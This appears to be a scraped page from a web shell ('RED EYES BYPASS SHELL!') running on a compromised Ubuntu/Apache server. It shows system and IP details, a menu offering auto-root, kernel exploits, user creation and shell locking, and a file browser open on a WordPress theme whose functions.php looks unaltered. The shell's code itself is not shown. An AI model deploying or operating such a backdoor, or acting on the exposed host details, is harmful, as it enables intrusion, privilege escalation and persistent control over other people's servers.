Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentytwentytwo /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
parts
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
contributing.txt
1.24
KB
-rwxr-xr-x
functions.php
1.46
KB
-rwxr-xr-x
index.php
215
B
-rwxr-xr-x
package-lock.json
52.91
KB
-rwxr-xr-x
package.json
774
B
-rwxr-xr-x
readme.txt
6.04
KB
-rwxr-xr-x
screenshot.png
156.75
KB
-rwxr-xr-x
style.css
6.34
KB
-rwxr-xr-x
style.min.css
2.44
KB
-rwxr-xr-x
theme.json
9.53
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Twenty Twenty-Two functions and definitions * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package WordPress * @subpackage Twenty_Twenty_Two * @since Twenty Twenty-Two 1.0 */ if ( ! function_exists( 'twentytwentytwo_support' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * @since Twenty Twenty-Two 1.0 * * @return void */ function twentytwentytwo_support() { // Add support for block styles. add_theme_support( 'wp-block-styles' ); // Enqueue editor styles. add_editor_style( 'style.css' ); } endif; add_action( 'after_setup_theme', 'twentytwentytwo_support' ); if ( ! function_exists( 'twentytwentytwo_styles' ) ) : /** * Enqueues styles. * * @since Twenty Twenty-Two 1.0 * * @return void */ function twentytwentytwo_styles() { // Register theme stylesheet. $theme_version = wp_get_theme()->get( 'Version' ); $version_string = is_string( $theme_version ) ? $theme_version : false; $suffix = SCRIPT_DEBUG ? '' : '.min'; $src = 'style' . $suffix . '.css'; wp_enqueue_style( 'twentytwentytwo-style', get_parent_theme_file_uri( $src ), array(), $version_string ); wp_style_add_data( 'twentytwentytwo-style', 'path', get_parent_theme_file_path( $src ) ); } endif; add_action( 'wp_enqueue_scripts', 'twentytwentytwo_styles' ); // Add block patterns. require get_template_directory() . '/inc/block-patterns.php';
Close